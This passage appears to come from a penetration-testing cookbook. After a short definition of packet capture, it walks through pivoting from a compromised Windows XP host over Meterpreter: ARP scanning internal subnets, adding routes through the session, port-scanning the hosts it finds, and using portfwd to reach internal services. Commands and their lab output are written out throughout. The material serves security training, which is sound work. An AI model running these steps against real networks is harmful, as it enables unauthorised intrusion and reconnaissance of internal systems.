According to Techopedia, packet capture is a computer networking term for intercepting a data packet that is crossing or moving over a specific computer network. Once a packet is captured, it is temporarily stored so that it can be analyzed. The packet is inspected to help diagnose and solve network problems and determine whether network security policies are being followed. Hackers can also use packet capturing techniques to steal data that is being transmitted over a network.
Network managers put in effort to analyze and maintain network traffic and its performance.
Different packet capturing methods are used to examine and capture real-time running packets over a network.
Packet capturing involves filtering. Filtering is a technique in which filters are applied over different nodes of network where data is being captured. In addition, conditional statements are used to specify which data is captured, that is, a filter might capture data coming from a PQR route and having a U.V.W.X IP address.
To increase the performance of filtering, complete packets should be captured, rather than a specific portion of a packet. The full packet consists of a payload and a header. The payload is the actual contents of the packet and the header possesses extra information, such as the packet's source and destination address.
After compromising a system on the network, our goal is to gather more and more information about the target environment and find open ports by having direct interaction with the target systems. The objectives include determining the addresses used by the systems, including hosts (servers and clients), network equipment (firewalls, routers, and switches), and other devices. In short, we want to determine the operating system, a list of listening TCP ports, which ports are open, and a list of crucial vulnerabilities. To achieve this goal, we will be using pivoting on a victim to attack deeper into the network.
Getting ready
The attacker (192.168.1.129) breaks into Windows XP on an Ethernet adapter,
1:192.168.1.130, which is connected to different routers. The attacker will run ipconfig from the Meterpreter session:
Meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00
How to do it...
1. The system is connected to three different IP ranges, which could lead to more targets to exploit. Now, we need to find out if there are any other IP addresses within the range, and we will use one of the Meterpreter scripts called arp_scanner. Arp_
scanner will perform an ARP scan for a given range through a compromised host, which is shown as follows:
meterpreter > run arp_scanner -r 192.168.15.1/24 [*] ARP Scanning 192.168.15.1/24
[*] IP: 192.168.15.5 MAC d8:d3:85:d3:8:2d [*] IP: 192.168.15.3 MAC 0:b:db:1d:d3:2b [*] IP: 192.168.15.1 MAC 0:17:ee:ca:32:b2 meterpreter > run arp_scanner -r 192.168.0.1/24 [*] ARP Scanning 192.168.0.1/24
[*] IP: 192.168.0.1 MAC 0:9:5b:fa:66:f2 [*] IP: 192.168.0.5 MAC 0:16:6f:79:68:0 [*] IP: 192.168.0.9 MAC 0:90:4b:12:34:4c [*] IP: 192.168.0.7 MAC 0:21:6a:b5:9a:f0
2. Now, we will add the route to our Meterpreter session. To do this, we use the route add command in the msf console (we will need to run the Meterpreter session in the background):
meterpreter > background
msf exploit(handler) > route add 192.168.15.1 255.255.255.0 1 [*] Route added
---192.168.15.1 255.255.255.0 Session 1
Observe the number 1 at the end of the route add; this actually describes the Meterpreter session that we are adding to the route. It implies the tunnel ID too. It is necessary that the tunnel ID match up to our route. One can have many different tunnel IDs to one or various IP addresses.
3. Next, we will leverage a port scanner to discover open ports on the IP listed from our ARP sweep. So, we will be loading the TCP port scanner found in the auxiliary tools and running it on the available IPs from the ARP sweep:
msf exploit(handler) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > set RHOSTS 192.168.15.1
RHOSTS => 192.168.15.1
msf auxiliary(tcp) > set PORTS 1-1024 PORTS => 1-1024
We can set the PORTS with the desired range we wish to scan (1-1024). Then type run and the results are as follows:
msf auxiliary(tcp) > run [*] 192.168.15.1:22 - TCP OPEN [*] 192.168.15.1:80 - TCP OPEN [*] 192.168.15.1:554 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(tcp) > set RHOSTS 192.168.15.2 RHOSTS => 192.168.15.2
msf auxiliary(tcp) > set PORTS 1-1024 PORTS => 1-1024
msf auxiliary(tcp) > run [*] 192.168.15.2:22 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(tcp) > set RHOSTS 192.168.15.5 RHOSTS => 192.168.15.5
msf auxiliary(tcp) > set PORTS 1-1024 PORTS => 1-1024
msf auxiliary(tcp) > run [*] 192.168.15.5:80 - TCP OPEN [*] 192.168.15.5:139 - TCP OPEN [*] 192.168.15.5:445 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description ---- ---- ---
---CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string for capturing traffic INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process PORTS 1-1024 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS 192.168.15.5 yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds VERBOSE false no Display verbose output
msf auxiliary(tcp) >
4. tcpdump and etherape are running on the attacker's system and the only visible traffic is TCP-UNKNOWN going to 192.168.1.130. All traffic is funneled through our exploited machine 192.168.1.130 to the other devices listed in the ARP scan. For tcpdump I use $ sudo tcpdump dst 192.168.1.130.
If you want a more detailed output, use $ sudo tcpdump -nnvvXSs 1514 dst 192.168.1.130.
5. Now, let's look at the results of the TCP scan and see if any ports are open. The results from the TCP scan of 192.168.15.0/24:192.168.15.5 are as follows tcp open ports 80,139, & 445.
192.168.15.2 tcp open port 22
192.168.15.1 tcp open ports 22, 80, & 554
6. If we want to scan another range, we need to remove the route and add another with the route remove command:
msf auxiliary(tcp) > route remove 192.168.15.1 255.255.255.0 1 [*] Route removed
msf auxiliary(tcp) > route add 192.168.0.1 255.255.255.0 1 [*] Route added
Active Routing Table
====================
Subnet Netmask Gateway --- -
---192.168.0.1 255.255.255.0 Session 1 Results from tcp scan of 192.168.0.0/24:
192.168.0.2 tcp open 135,139, & 445 192.168.0.9 tcp open 23,135,139, & 445 192.168.0.1 tcp open 80
There's more…
If we found ports such as 22, 23, and 80 open, we can use the portfwd command to gain access to an internal web server. Then, we will run netcat and telnet on ports 22 and 23.
The portfwd command can be used with any of the TCP-based services on the target's network to gain access to internal resources once the machine has been compromised.